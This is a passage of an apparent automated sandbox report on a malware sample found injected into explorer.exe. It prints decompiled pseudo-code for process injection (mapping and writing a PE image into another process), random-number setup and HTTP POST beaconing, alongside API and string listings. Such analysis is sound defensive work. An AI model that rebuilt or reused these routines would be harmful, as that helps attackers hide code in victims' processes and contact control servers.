					_t177 =  *0x32ff8e0; // 0x52ef6c8
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x32ff8e0; // 0x52ef6c8
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E032E8D41( &_v8);
					_t113 =  *0x32ff8e0; // 0x52ef6c8
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E032E9FEE(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x32ff8e0; // 0x52ef6c8
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x32ff8e0; // 0x52ef6c8
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x32ff8e0; // 0x52ef6c8
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x32ff8e0; // 0x52ef6c8
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x32ff8e0; // 0x52ef6c8
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x32ff8e0; // 0x52ef6c8
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E032F35C6(E032EE3C8(_t62, E032EA5DA(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E032F3598( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E032E9877(_t66, _t191);
					 *((intOrPtr*)(_t192 + 0x1898)) = E032EDBE6(_t191);
					return _t192;
				}
				return _t68;
			}




















































                                                                                                            0x032ee040
                                                                                                            0x032ee04a
                                                                                                            0x032ee056
                                                                                                            0x032ee05b
                                                                                                            0x032ee060
                                                                                                            0x032ee06d
                                                                                                            0x032ee073
                                                                                                            0x032ee078
                                                                                                            0x032ee07e
                                                                                                            0x032ee08e
                                                                                                            0x032ee093
                                                                                                            0x032ee098
                                                                                                            0x032ee098
                                                                                                            0x032ee0a8
                                                                                                            0x032ee0ae
                                                                                                            0x032ee0b0
                                                                                                            0x032ee0b9
                                                                                                            0x032ee0b9
                                                                                                            0x032ee0bf
                                                                                                            0x032ee0cc
                                                                                                            0x032ee0d1
                                                                                                            0x032ee0d7
                                                                                                            0x032ee0e0
                                                                                                            0x032ee0ee
                                                                                                            0x032ee0f5
                                                                                                            0x032ee0fa
                                                                                                            0x032ee0fa
                                                                                                            0x032ee0fb
                                                                                                            0x032ee0e2
                                                                                                            0x032ee0e2
                                                                                                            0x032ee0e2
                                                                                                            0x032ee101
                                                                                                            0x032ee10c
                                                                                                            0x032ee117
                                                                                                            0x032ee11d
                                                                                                            0x032ee11d
                                                                                                            0x032ee126
                                                                                                            0x032ee12c
                                                                                                            0x032ee130
                                                                                                            0x032ee137
                                                                                                            0x032ee13e
                                                                                                            0x032ee145
                                                                                                            0x032ee149
                                                                                                            0x032ee150
                                                                                                            0x032ee151
                                                                                                            0x032ee153
                                                                                                            0x032ee158
                                                                                                            0x032ee15f
                                                                                                            0x032ee161
                                                                                                            0x032ee161
                                                                                                            0x032ee167
                                                                                                            0x032ee171
                                                                                                            0x032ee176
                                                                                                            0x032ee176
                                                                                                            0x032ee183
                                                                                                            0x032ee189
                                                                                                            0x032ee18e
                                                                                                            0x032ee190
                                                                                                            0x032ee199
                                                                                                            0x032ee199
                                                                                                            0x032ee1a1
                                                                                                            0x032ee1a6
                                                                                                            0x032ee1a6
                                                                                                            0x032ee1ac
                                                                                                            0x032ee1b7
                                                                                                            0x032ee1bc
                                                                                                            0x032ee1c4
                                                                                                            0x032ee1ca
                                                                                                            0x032ee1d2
                                                                                                            0x032ee1e4
                                                                                                            0x032ee1ea
                                                                                                            0x032ee1f2
                                                                                                            0x032ee1f7
                                                                                                            0x032ee215
                                                                                                            0x032ee21b
                                                                                                            0x032ee220
                                                                                                            0x032ee223
                                                                                                            0x032ee226
                                                                                                            0x032ee233
                                                                                                            0x032ee239
                                                                                                            0x032ee243
                                                                                                            0x032ee243
                                                                                                            0x032ee249
                                                                                                            0x032ee251
                                                                                                            0x032ee25c
                                                                                                            0x032ee261
                                                                                                            0x032ee267
                                                                                                            0x032ee269
                                                                                                            0x032ee276
                                                                                                            0x032ee277
                                                                                                            0x032ee278
                                                                                                            0x032ee283
                                                                                                            0x032ee285
                                                                                                            0x032ee28c
                                                                                                            0x032ee28c
                                                                                                            0x032ee296
                                                                                                            0x032ee29b
                                                                                                            0x032ee2a0
                                                                                                            0x032ee2a0
                                                                                                            0x032ee2a6
                                                                                                            0x032ee2ad
                                                                                                            0x032ee2ae
                                                                                                            0x032ee2bb
                                                                                                            0x032ee2ce
                                                                                                            0x032ee2d3
                                                                                                            0x032ee2d8
                                                                                                            0x032ee2e1
                                                                                                            0x032ee2e1
                                                                                                            0x032ee2e7
                                                                                                            0x032ee2ec
                                                                                                            0x032ee2f2
                                                                                                            0x032ee2f8
                                                                                                            0x032ee2fd
                                                                                                            0x032ee306
                                                                                                            0x032ee308
                                                                                                            0x032ee30f
                                                                                                            0x032ee30f
                                                                                                            0x032ee315
                                                                                                            0x032ee31d
                                                                                                            0x032ee322
                                                                                                            0x032ee323
                                                                                                            0x032ee328
                                                                                                            0x032ee331
                                                                                                            0x032ee333
                                                                                                            0x032ee33e
                                                                                                            0x032ee33e
                                                                                                            0x032ee347
                                                                                                            0x032ee34f
                                                                                                            0x032ee356
                                                                                                            0x032ee35b
                                                                                                            0x032ee36a
                                                                                                            0x032ee382
                                                                                                            0x032ee389
                                                                                                            0x032ee397
                                                                                                            0x032ee3a2
                                                                                                            0x032ee3a3
                                                                                                            0x032ee3a7
                                                                                                            0x032ee3ad
                                                                                                            0x032ee3ae
                                                                                                            0x032ee3bb
                                                                                                            0x00000000
                                                                                                            0x032ee3c3
                                                                                                            0x032ee3c7

                                                                                                            APIs
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 032EE067
                                                                                                            • GetLastError.KERNEL32 ref: 032EE161
                                                                                                            • GetVersionExA.KERNEL32(00000000), ref: 032EE226
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 032EE251
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCurrentDirectoryErrorHeapLastProcessVersionWindows
                                                                                                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                            • API String ID: 3743117707-2706916422
                                                                                                            • Opcode ID: 54d5036cefcbff1c778cf86e14d5f5ec1c9873bc5b855a05b6cb664d8759563b
                                                                                                            • Instruction ID: fe2e6347b8eaf31471e02281484c914ccfcf77994cd7bd610efaf1e3918d043a
                                                                                                            • Opcode Fuzzy Hash: 54d5036cefcbff1c778cf86e14d5f5ec1c9873bc5b855a05b6cb664d8759563b
                                                                                                            • Instruction Fuzzy Hash: 2B918E75710605AFD704FBB0E849FEAB7A8FF08700F444179E519DB240EBB4AA948BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032ED54A Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 223registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E032ED54A(intOrPtr __ecx, intOrPtr __edx) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				struct HINSTANCE__* _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				struct HINSTANCE__* _v48;
				char _v52;
				struct HINSTANCE__* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t90;
				intOrPtr _t95;
				char _t97;
				short _t98;
				intOrPtr _t105;
				void* _t107;
				intOrPtr _t110;
				intOrPtr _t113;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				struct HINSTANCE__* _t138;
				intOrPtr _t145;
				void* _t147;
				char _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t160;
				intOrPtr _t162;
				char _t163;
				void* _t165;

				_t81 =  *0x32ff8e4; // 0x3310000
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E032EF1DB(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x32ff9e0; // 0x0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x32ff8e0; // 0x52ef6c8
						_t160 =  *0x32ff9e0; // 0x0
						 *((intOrPtr*)(_t160 + 0x10))( *((intOrPtr*)(_t87 + 0x12c))(_v16));
					}
					if(_v20 != 0) {
						_t85 =  *0x32ff9e0; // 0x0
						 *((intOrPtr*)(_t85 + 0x20))(_v20);
					}
					return _v8;
				}
				_push(_t138);
				_push(0x8000000);
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				_push(0x40);
				_push( &_v52);
				_push(_t138);
				_push(0xe);
				_push( &_v20);
				_t95 =  *0x32ff9e0; // 0x0
				if( *((intOrPtr*)(_t95 + 0xc))() < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x32fce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t162 =  *0x32ff9e0; // 0x0
				_t105 =  *0x32ff8e0; // 0x52ef6c8
				_t107 =  *((intOrPtr*)(_t162 + 0x14))(_v20,  *((intOrPtr*)(_t105 + 0x12c))( &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40));
				_t158 = _v12;
				if(_t107 < 0) {
					goto L15;
				} else {
					_push(0x40);
					_push(_t138);
					_push(2);
					_push( &_v24);
					_push(_t138);
					_push(_t138);
					_push(_t138);
					_push( &_v8);
					_t110 =  *0x32ff9e0; // 0x0
					_push(_t158);
					_push(_v20);
					if( *((intOrPtr*)(_t110 + 0x14))() < 0) {
						goto L15;
					}
					_t154 = E032E8DD5( *0x32ff8e4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t113 =  *0x32ff8e0; // 0x52ef6c8
					_t163 =  *((intOrPtr*)(_t113 + 0x54))(_t158, _t138, 0x1ac4, 0x1000, 4);
					_t145 =  *0x32ff8e0; // 0x52ef6c8
					 *((intOrPtr*)(_t145 + 0x20))(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E032E8D86( &_v36, 0x1ac4);
					_t119 =  *0x32ff8e4; // 0x3310000
					_t155 =  *0x32ff8f8; // 0x32e0000
					_v36 = _t119;
					 *0x32ff8f8 = _v8;
					 *0x32ff8e4 = _t163;
					E032E8E4D(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E032ED4C9(_v16, _v8, _v44);
					_t124 = E032EA5DA("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 =  &(_t138->i);
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x32ff8f8 = _t155;
						 *0x32ff8e4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}













































                                                                                                            0x032ed550
                                                                                                            0x032ed556
                                                                                                            0x032ed558
                                                                                                            0x032ed55c
                                                                                                            0x032ed55e
                                                                                                            0x032ed561
                                                                                                            0x032ed564
                                                                                                            0x032ed567
                                                                                                            0x032ed56a
                                                                                                            0x032ed56d
                                                                                                            0x032ed578
                                                                                                            0x032ed57b
                                                                                                            0x032ed582
                                                                                                            0x032ed582
                                                                                                            0x032ed587
                                                                                                            0x032ed58a
                                                                                                            0x032ed58c
                                                                                                            0x032ed58f
                                                                                                            0x032ed598
                                                                                                            0x032ed791
                                                                                                            0x032ed791
                                                                                                            0x032ed794
                                                                                                            0x032ed797
                                                                                                            0x032ed79c
                                                                                                            0x032ed7a2
                                                                                                            0x032ed7a5
                                                                                                            0x032ed7a5
                                                                                                            0x032ed7a8
                                                                                                            0x032ed7ac
                                                                                                            0x032ed7ae
                                                                                                            0x032ed7b6
                                                                                                            0x032ed7c3
                                                                                                            0x032ed7c3
                                                                                                            0x032ed7cd
                                                                                                            0x032ed7cf
                                                                                                            0x032ed7d7
                                                                                                            0x032ed7d7
                                                                                                            0x032ed7de
                                                                                                            0x032ed7de
                                                                                                            0x032ed5a1
                                                                                                            0x032ed5a2
                                                                                                            0x032ed5a7
                                                                                                            0x032ed5ad
                                                                                                            0x032ed5af
                                                                                                            0x032ed5b0
                                                                                                            0x032ed5b1
                                                                                                            0x032ed5b6
                                                                                                            0x032ed5b7
                                                                                                            0x032ed5c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ed5c7
                                                                                                            0x032ed5cf
                                                                                                            0x032ed5d7
                                                                                                            0x032ed5dd
                                                                                                            0x032ed5e4
                                                                                                            0x032ed5ec
                                                                                                            0x032ed5ed
                                                                                                            0x032ed5f4
                                                                                                            0x032ed5f7
                                                                                                            0x032ed5f8
                                                                                                            0x032ed5ff
                                                                                                            0x032ed602
                                                                                                            0x032ed609
                                                                                                            0x032ed60a
                                                                                                            0x032ed60d
                                                                                                            0x032ed619
                                                                                                            0x032ed63b
                                                                                                            0x032ed643
                                                                                                            0x032ed646
                                                                                                            0x032ed651
                                                                                                            0x032ed651
                                                                                                            0x032ed643
                                                                                                            0x032ed657
                                                                                                            0x032ed66d
                                                                                                            0x032ed67c
                                                                                                            0x032ed67f
                                                                                                            0x032ed684
                                                                                                            0x00000000
                                                                                                            0x032ed68a
                                                                                                            0x032ed68a
                                                                                                            0x032ed68c
                                                                                                            0x032ed68d
                                                                                                            0x032ed692
                                                                                                            0x032ed693
                                                                                                            0x032ed694
                                                                                                            0x032ed695
                                                                                                            0x032ed699
                                                                                                            0x032ed69a
                                                                                                            0x032ed69f
                                                                                                            0x032ed6a0
                                                                                                            0x032ed6a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ed6be
                                                                                                            0x032ed6c0
                                                                                                            0x032ed6c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ed6dc
                                                                                                            0x032ed6e2
                                                                                                            0x032ed6ef
                                                                                                            0x032ed6fd
                                                                                                            0x032ed703
                                                                                                            0x032ed70f
                                                                                                            0x032ed714
                                                                                                            0x032ed719
                                                                                                            0x032ed71f
                                                                                                            0x032ed725
                                                                                                            0x032ed72d
                                                                                                            0x032ed73d
                                                                                                            0x032ed749
                                                                                                            0x032ed753
                                                                                                            0x032ed75b
                                                                                                            0x032ed760
                                                                                                            0x032ed763
                                                                                                            0x032ed76b
                                                                                                            0x032ed76b
                                                                                                            0x032ed76b
                                                                                                            0x032ed76e
                                                                                                            0x032ed772
                                                                                                            0x032ed773
                                                                                                            0x032ed777
                                                                                                            0x032ed77b
                                                                                                            0x032ed784
                                                                                                            0x032ed78a
                                                                                                            0x00000000
                                                                                                            0x032ed78a
                                                                                                            0x032ed765
                                                                                                            0x032ed769
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ed769

                                                                                                            APIs
                                                                                                            • RegisterClassExA.USER32(?), ref: 032ED610
                                                                                                            • CreateWindowExA.USER32 ref: 032ED63B
                                                                                                            • DestroyWindow.USER32(00000000), ref: 032ED646
                                                                                                            • UnregisterClassA.USER32 ref: 032ED651
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,032E623D), ref: 032ED77B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ClassWindow$CreateDestroyFreeHeapRegisterUnregisterlstrlen
                                                                                                            • String ID: 0$18293$Jjischug$aeroflot
                                                                                                            • API String ID: 1751977465-3772587274
                                                                                                            • Opcode ID: 16221df3c097a91e73b9bc2fa8caf4754c93ce422a46a29bd495f3fb7d646abd
                                                                                                            • Instruction ID: 204c2f4d74a26715566da32c34798d653f9ec477229faedc52900b159de761dc
                                                                                                            • Opcode Fuzzy Hash: 16221df3c097a91e73b9bc2fa8caf4754c93ce422a46a29bd495f3fb7d646abd
                                                                                                            • Instruction Fuzzy Hash: C0815AB5A10219BFDB00EF94E989EEEBBF8FB08714F14406AE604E7250D7709940CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F296E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 30%
                                                                                                            			E032F296E(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E032F28C9( &_v16);
				return 0;
			}











                                                                                                            0x032f2974
                                                                                                            0x032f2986
                                                                                                            0x032f298a
                                                                                                            0x032f29fe
                                                                                                            0x00000000
                                                                                                            0x032f2a00
                                                                                                            0x032f299a
                                                                                                            0x032f299e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f29a6
                                                                                                            0x032f29a8
                                                                                                            0x032f29ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f29b7
                                                                                                            0x032f29bb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f29bd
                                                                                                            0x032f29c2
                                                                                                            0x032f29c4
                                                                                                            0x032f29c6
                                                                                                            0x032f29cb
                                                                                                            0x032f29d0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f29db
                                                                                                            0x032f29e5
                                                                                                            0x032f29e9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f29f8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,032E7C2B), ref: 032F2980
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 032F2998
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 032F29A6
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 032F29B5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                            • API String ID: 667068680-129414566
                                                                                                            • Opcode ID: f84976287738dbbf8031c57d9dc468bdb29dd62723af03591f9e58abed27c39a
                                                                                                            • Instruction ID: b78e14f59a000fc306caeb7752672c955440eccab7a768edb2418e2b57ab711d
                                                                                                            • Opcode Fuzzy Hash: f84976287738dbbf8031c57d9dc468bdb29dd62723af03591f9e58abed27c39a
                                                                                                            • Instruction Fuzzy Hash: 8711E53AA6031AFFDB61EAB49C45F9EF7AC9F85610F250570EB00F3140DBB0DA809664
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EF823 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E032EF823(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t170;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E032E9F75(0xab3);
				_v52 = E032E9F75(0x3f9);
				_v48 = E032E9F75(0x40f);
				_t93 = E032E9F75(0x1eb);
				_t170 = 0x58;
				_v44 = _t93;
				_t94 = E032E9F75(_t170);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E032E8F0A( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E032EA5DA(_t190));
				_t102 =  *0x32ff900; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x32ff900; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x32ff9e8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E032EF7BB(_t189);
							_t110 =  *0x32ff900; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E032EA202(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x32ff900; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E032EA202(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E032EF769(_t116);
									}
									_t117 = E032E9F75(0xfb0);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x32ff900; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E032EA5DA(_t193), _a4, _a8);
									E032E8D2E( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E032EA202(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E032E8F0A( &_v20, 0, _t122);
										_t127 =  *0x32ff900; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E032EA10C( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x32ff900; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x32ff900; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x32ff900; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x32ff900; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x32ff900; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x32ff900; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x32ff900; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x32ff900; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x32ff900; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}































































                                                                                                            0x032ef831
                                                                                                            0x032ef83d
                                                                                                            0x032ef844
                                                                                                            0x032ef851
                                                                                                            0x032ef854
                                                                                                            0x032ef865
                                                                                                            0x032ef87c
                                                                                                            0x032ef889
                                                                                                            0x032ef896
                                                                                                            0x032ef899
                                                                                                            0x032ef8a0
                                                                                                            0x032ef8a1
                                                                                                            0x032ef8a4
                                                                                                            0x032ef8a9
                                                                                                            0x032ef8ae
                                                                                                            0x032ef8b0
                                                                                                            0x032ef8b8
                                                                                                            0x032ef8c0
                                                                                                            0x032ef8c7
                                                                                                            0x032ef8d3
